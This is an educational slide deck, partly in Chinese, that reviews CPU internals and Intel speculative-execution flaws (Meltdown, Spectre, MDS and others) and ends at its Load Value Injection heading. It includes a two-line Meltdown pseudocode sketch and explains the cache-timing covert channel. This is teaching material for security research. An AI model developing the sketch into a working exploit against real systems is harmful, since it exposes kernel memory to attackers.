# Load Value Injection ## Shin Li. TrendMicro.inc <!-- Put the link to this slide here so people can follow --> slide:https://hackmd.io/@Shinshipower/rylWHu21w --- ## First of All, Why this Slide (and why on working) ---- 自從修完計算機組織/結構後，你有多久沒有試著理解CPU或者現代電腦是如何運作的呢？ ---- ### 算盤書 算盤書常見的版本通常是 MIPS架構為範例，從single stage 到 三級五級pipeline 受限於學制長度，往往僅教學最基本的部分. 然而在cpu發展史中cpu早已擁有巨大變化 ---- #### Black Magics 由於x86等主流cpu架構大多數文件並不齊全，導致學習者大多數會從mips/arm/riscV下手學習。 有本俗稱柱子書的教科書以intel架構為範例，然而也僅限於教學程度。 ---- <!-- .slide: data-transition="normal-in zoom-out" --> #### 你每天在用的東西你不想瞭解他/黑了他嗎？ ---- <!-- .slide: data-transition="zoom" --> ### 歡慶若渴計劃100週回 ---- <!-- .slide: data-transition="zoom" --> ## 我居然提前做了投影片！ <span>因為漏洞太多了......<!-- .element: class="fragment" data-fragment-index="1" --></span> <span>重新閱讀一篇論文＋歸納重點一個晚上就不見了<!-- .element: class="fragment" data-fragment-index="2" --></span> <span>當然會<!-- .element: class="fragment" data-fragment-index="3" --></span><span> ~~拖稿~~<!-- .element: class="fragment" data-fragment-index="4" --></span><span> 未完待續<!-- .element: class="fragment" data-fragment-index="5" --></span> --- ## Agenda - Modern CPU recalls - Those Black magic inside x86 processor - Intel Vulerabilities - Load Value Injection --- ## Modern CPU REF : [現代處理器設計教材整理by Jserv](http://hackfoldr.org/cpu/) ---- ### Cache ---- ### Branch Prediction ---- ### Micro OP ---- ### Out of Order excution (OOOe) ---- ### SuperScalar (超純量) ---- ### Simultaneous multithreading (SMT) --- ## Those Black Magic inside x86 Processor ---- ### Co-processor ---- ### Predicting Everything ---- ### Cache Everywhere --- ## Intel Vulnerabilitie"s" Recall 那些年Intel幹的蠢事 ---- ## Speculative execution Side Channel Attack on Modern x86的起點 - Meltdown （來不及煞車跑過頭） - Spectre （欺騙各種預測器） - Foreshadow - LasyFP Dynamic Graph:https://transient.fail/ ref:https://zhuanlan.zhihu.com/p/32784852 --- ### Meltdown wiki:https://zh.wikipedia.org/zh-tw/%E7%86%94%E6%AF%81_(%E5%AE%89%E5%85%A8%E6%BC%8F%E6%B4%9E) 萬惡之源 ~~莉亞布羅~~ 超級扯淡 Up to 500KByte/s Watch everything in your kernel from user space. ---- #### Meltdown -2 必備要素: ~~Intel Processor~~ - Out of Order excution - Only Depend on Program Counter & Exception - Exception(or any ring/permission/kernel/protect change) - Make following command transiently excuted **In Bad Permission** - Convert Channel - simply achieve by compare **Load Latency** Fixup: ~~AMD YES~~ - KAISER - Load Page Table when processor status change. - Smash on Performance, Back to Pentium4! ---- #### Meltdown 3 Simple POC : ``` C= raise_exception(); access(probe_data[data*4096]); ``` 1. either DIV0 or Access violation, trigger "Status Change" in processor. 2. When processor enter exception status, **Out Of Order excution unit** excute this line **With Exception Permission Level (somehow root)** Processor will finally cancel line2 when return from exception mode. However, Processor doesn't cleanup Cache!. This makes a super simple Convert Channel. Just Test the Latency while Loading. --- ### Spectre Wiki:https://zh.wikipedia.org/wiki/%E5%B9%BD%E7%81%B5%E6%BC%8F%E6%B4%9E 打不死的小強 ~~歷史共業之術~~ 幾乎有speculative excution unit的ISA都會發生 或者說 會「預測」的unit都會被利用 因此怎麼修都修不完 ---- #### Spectre 2 ---- ## Intel Vulnerabilitie"s" Recall-2 - Microarchtecture Data Sampling (MDS) - ZombieLoad and RIDL - Fallout - SWAPGS - Snoop ---- ## Intel Vulnerabilitie"s" Recall-3 - Spoiler - CrossTalk - Portsmash - NetCAT - And more... --- ## Load Value Injection (LVI)